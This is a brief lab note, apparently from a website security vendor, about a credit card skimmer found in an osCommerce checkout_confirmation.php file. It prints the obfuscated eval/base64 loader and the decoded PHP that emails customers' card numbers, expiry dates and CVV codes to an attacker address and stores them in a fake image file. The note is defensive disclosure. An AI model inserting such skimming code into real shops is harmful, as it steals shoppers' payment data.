Credit Card Stealer on osCommerce

Labs Note

We regularly detect malware that targets payment modules on compromised ecommerce websites, mainly on Magento.

Recently we’ve stumbled upon the same threat on osCommerce. The malicious code was found inside ./catalog/checkout_confirmation.php and used obfuscation as below:

…eval(gzinflate(str_rot13(base64_decode('Dc9UsqJAAADQ43x/sRAQFHdJ5ByUBoTNRxMaVg0i0dPPvBu8ZYXdqfrWGGhjLkIZ/JRK5mJE5lBEnn5Dd7qA3zbFyNbzI47VvBPpQ…wSmhNUk33O2C+uFKeOUAGdb8UyETzPEp1nvg7hIgQB5355jGg9LQuJGxB31rYoBLc7LHDv0hwC8L3ocO4KlLduNn6ntts7EmJ1z1lZuZ4tFt4U12paYTRI+dIKnefP7+/vn38='))));…

When decoded, the code appeared to be a credit card stealer. The code sends a copy of stolen credit card information to attacker’s email and saves it inside an image file for backup purposes. This happens every time customers submit their payment details during the checkout process:

$recipient = "<attacker’s-email-address>@gmail.com";$subject = "www.<compromised-site>.com";$mailheaders = "From: www.<compromised-site>.com <sales@ www.<compromised-site>.com >";$address4 = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', '<br>');$ip = getenv("REMOTE_ADDR");…$message .= "Name on card: ".$_POST['cc_owner']." CC: ".$_POST['cc_number']." Exp: ".$_POST['cc_expires_month']         ."/".$_POST['cc_expires_year']." CVV2: ".$_POST['cc_ccv']."n";…mail($recipient, $subject, $message, $mailheaders);$f = fopen('/<path to public directory>/catalog/images/oscommerce2.gif','a');fputs($f, $message . "n"); fclose($f);

If you’re using osCommerce as ecommerce solution, always check your core files, especially ./catalog/checkout_confirmation.php for any modified content, and do regular scans. As always, if you need a professional service for your osCommerce website, you can count on our Website AntiVirus service.

You May Also Like